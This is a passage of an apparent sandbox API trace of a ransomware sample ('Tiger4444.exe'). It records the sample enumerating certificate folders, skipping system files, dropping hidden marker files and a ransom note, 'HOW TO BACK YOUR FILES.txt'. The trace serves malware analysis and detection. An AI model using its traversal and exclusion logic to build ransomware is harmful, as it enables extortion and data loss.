ftLastAccessTime.dwLowDateTime=0xc6328090, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.246] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.246] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.246] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.246] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.246] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.246] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842221c0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842221c0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.246] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.246] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.246] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc6328090, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc6328090, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc6328090, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppContainerUserCertRead", cAlternateFileName="APPCON~1")) returned 1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="Tiger4444.exe") returned -1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2=".") returned 1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="..") returned 1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="windows") returned -1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="bootmgr") returned -1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="pagefile.sys") returned -1 [0052.246] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="boot") returned -1 [0052.247] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ids.txt") returned -1 [0052.247] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="NTUSER.DAT") returned -1 [0052.247] lstrcpyW (in: lpString1=0x30aeb28, lpString2="AppContainerUserCertRead" | out: lpString1="AppContainerUserCertRead") returned="AppContainerUserCertRead" [0052.247] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead", dwFileAttributes=0x20) returned 1 [0052.247] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead", dwFileAttributes=0x4) returned 1 [0052.247] lstrlenW (lpString="AppContainerUserCertRead") returned 24 [0052.247] lstrlenW (lpString="Tiger4444") returned 9 [0052.247] lstrcmpiW (lpString1="rCertRead", lpString2="Tiger4444") returned -1 [0052.247] lstrlenW (lpString=".dll") returned 4 [0052.247] lstrcmpiW (lpString1="Read", lpString2=".dll") returned 1 [0052.247] lstrlenW (lpString=".lnk") returned 4 [0052.247] lstrcmpiW (lpString1="Read", lpString2=".lnk") returned 1 [0052.247] lstrlenW (lpString=".ini") returned 4 [0052.247] lstrcmpiW (lpString1="Read", lpString2=".ini") returned 1 [0052.247] lstrlenW (lpString=".sys") returned 4 [0052.247] lstrcmpiW (lpString1="Read", lpString2=".sys") returned 1 [0052.247] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62a3729f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3b6c131, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x62a3729f, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="Tiger4444.exe") returned -1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="windows") returned -1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="bootmgr") returned 1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="pagefile.sys") returned -1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="boot") returned 1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="ids.txt") returned -1 [0052.247] lstrcmpiW (lpString1="Certificates", lpString2="NTUSER.DAT") returned -1 [0052.248] lstrcpyW (in: lpString1=0x30aeb28, lpString2="Certificates" | out: lpString1="Certificates") returned="Certificates" [0052.248] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", dwFileAttributes=0x2010) returned 1 [0052.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc916c8 [0052.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x9a) returned 0xc61df8 [0052.248] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc916d0 | out: ListHead=0xc66828, ListEntry=0xc916d0) returned 0xc91510 [0052.248] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc5fe0cd1, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c4d7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc5fe0cd1, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="Tiger4444.exe") returned -1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="windows") returned -1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="bootmgr") returned 1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="pagefile.sys") returned -1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="boot") returned 1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="ids.txt") returned -1 [0052.248] lstrcmpiW (lpString1="CRLs", lpString2="NTUSER.DAT") returned -1 [0052.248] lstrcpyW (in: lpString1=0x30aeb28, lpString2="CRLs" | out: lpString1="CRLs") returned="CRLs" [0052.248] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", dwFileAttributes=0x2010) returned 1 [0052.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc916e8 [0052.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8a) returned 0xc85a30 [0052.248] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc916f0 | out: ListHead=0xc66828, ListEntry=0xc916f0) returned 0xc916d0 [0052.249] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="Tiger4444.exe") returned -1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="windows") returned -1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="bootmgr") returned 1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="pagefile.sys") returned -1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="boot") returned 1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="ids.txt") returned -1 [0052.249] lstrcmpiW (lpString1="CTLs", lpString2="NTUSER.DAT") returned -1 [0052.249] lstrcpyW (in: lpString1=0x30aeb28, lpString2="CTLs" | out: lpString1="CTLs") returned="CTLs" [0052.249] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", dwFileAttributes=0x2010) returned 1 [0052.249] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc91348 [0052.249] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8a) returned 0xc85f88 [0052.249] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc91350 | out: ListHead=0xc66828, ListEntry=0xc91350) returned 0xc916f0 [0052.249] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 0 [0052.249] FindClose (in: hFindFile=0xc73088 | out: hFindFile=0xc73088) returned 1 [0052.249] lstrcpyW (in: lpString1=0x30aeb28, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.250] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.250] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.250] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.250] CloseHandle (hObject=0x2c8) returned 1 [0052.250] CloseHandle (hObject=0x2ac) returned 1 [0052.250] GetCurrentThreadId () returned 0xfa8 [0052.250] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91350 [0052.250] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0052.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85f88 | out: hHeap=0xc50000) returned 1 [0052.250] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91348 | out: hHeap=0xc50000) returned 1 [0052.250] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0052.250] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0052.250] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3" [0052.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.252] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.254] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.255] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.255] CloseHandle (hObject=0x2ac) returned 1 [0052.255] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 68 [0052.255] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.255] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d88 [0052.255] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.256] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.256] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.256] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.256] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.256] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.256] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.256] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.256] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.256] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.256] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84294a31, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84294a31, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.256] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.256] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.256] FindNextFileW (in: hFindFile=0xc72d88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84294a31, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84294a31, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84294a31, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.256] FindClose (in: hFindFile=0xc72d88 | out: hFindFile=0xc72d88) returned 1 [0052.257] lstrcpyW (in: lpString1=0x30aeb32, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.257] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.257] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.257] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.257] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.257] CloseHandle (hObject=0x2c8) returned 1 [0052.257] CloseHandle (hObject=0x2ac) returned 1 [0052.257] GetCurrentThreadId () returned 0xfa8 [0052.257] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc916f0 [0052.257] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0052.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85a30 | out: hHeap=0xc50000) returned 1 [0052.258] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc916e8 | out: hHeap=0xc50000) returned 1 [0052.258] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0052.258] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0052.258] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3" [0052.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.258] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.261] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.261] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.262] CloseHandle (hObject=0x2ac) returned 1 [0052.262] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 68 [0052.262] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.262] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc5fe0cd1, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c4d7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.262] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.262] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.262] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.262] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.262] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc5fe0cd1, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c4d7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.262] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.262] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.262] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.262] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.263] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.263] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842babe0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842babe0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.263] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.263] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.263] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x842babe0, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x842babe0, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x842babe0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.263] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.263] lstrcpyW (in: lpString1=0x30aeb32, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.263] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\how to back your 